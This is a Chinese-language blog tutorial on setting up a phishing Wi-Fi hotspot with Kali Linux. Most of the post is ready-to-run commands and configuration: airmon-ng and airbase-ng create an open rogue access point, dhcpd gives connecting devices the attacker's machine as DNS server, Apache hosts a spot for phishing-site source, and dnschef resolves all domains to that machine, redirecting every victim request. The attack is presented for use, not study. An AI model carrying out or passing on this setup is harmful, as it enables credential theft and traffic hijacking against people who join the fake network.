疫情来袭,在家无聊,写篇博客解解闷。

搭建钓鱼wifi,这里我用的是kali系统,如果你有一个外置usb无线网卡,那么恭喜你,可以在虚拟机安装kali就可以。如果你恰好和我一样没有外置无线网卡,那就只能把kali安装到物理机了(注意一定要记得==分区!分区!分区!==)

具体怎么安装到物理机,有时间在给大家讲讲

0.首先,把网卡切换到监听模式并创建热点

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airmon-ng start wlan0  //建立监听

这里的wlan0是自己的无线网卡,可以输入ifconfig查看
(最后一条命令多执行几次,直到ifconfig出现wlan0mon)
然后创建一个名为CCDX的热点

airbase-ng -e CCDX -c 11 wlan0mon

出现这样,唉说明你创建热点成功了(这时这个窗口不要关)

这时用你的手机就可以搜到名为CCDX的热点但无法连接,因为没有分配ip

1.建立虚拟网卡并打开ip转发

这一步的意义是将这张网卡的流量转发到虚拟网卡上

(注意,这是要重新打开一个终端,因为之前那个终端已经用来开启热点了)

ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward

创建一个虚拟网卡at0并设置ip,子网掩码和网关

2.配置dhcp服务器

这里使用dhcpd来作为dhcp服务器

vim /etc/dhcp/dhcpd.conf

在dhcpd.config里复制粘贴以下内容

authoritative;

default-lease-time 700;#默认租约时间
max-lease-time 8000;#设置最大租约时间

subnet 10.0.0.0 netmask 255.255.255.0 {     #设置子网属性,netmask关键字指定子网掩码
option routers 10.0.0.1;           #指定为客户机分配的默认网关地址
option subnet-mask 255.255.255.0;  #指定为客户机分配的子网掩码地址

option domain-name-servers 10.0.0.1;#设置DNS服务器地址

range 10.0.0.10 10.0.0.100;         #设置动态分配的IP地址范围

}

具体配置解释已经注释在配置中,需要一点网络基础,如果不懂就直接复制粘贴吧

然后启动dhcp服务器

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0

出现以下,就说明启动成功了

3.搭建钓鱼网站

这里使用apache搭建
网站路径在/var/www/html/下
到时候把钓鱼网站的源码放在这里就行
这里新建一个index.html做测试用

<font size="20" color="red"> You've been hacked !!!!!!!!!!!!</font>
<br><br>
<font face="verdana" color="green">created by yuaneuro</font>

然后启动apache服务

service apache2 start

访问127.0.0.1即可看到

4.劫持DNS

那么如何让连到我们钓鱼wifi的人访问这个网页呢,这是就是需要dns来发挥作用
众所周知dns的作用是把域名解析成ip,前面用dhcp分配ip的时候就已经吧dns服务器指向本机了
这里不需要再搭建dns服务器了,dnschef将是一个很好的工具

dnschef -i 10.0.0.1 --fakeip 10.0.0.1

这条命令的作用是监听10.0.0.1并将所有域名泛解析成10.0.0.1也就是本地

5.至此,现在就可以用手机去测试了

可以看到我的ipad已经连接到我的钓鱼热点


并已经自动获取到我们设置的ip和dns

无论你输入什么网站都会自动跳转到我们的界面


6.结束

如果有什么不懂的地方可以问我,共同进步

最后修改:2021 年 01 月 20 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏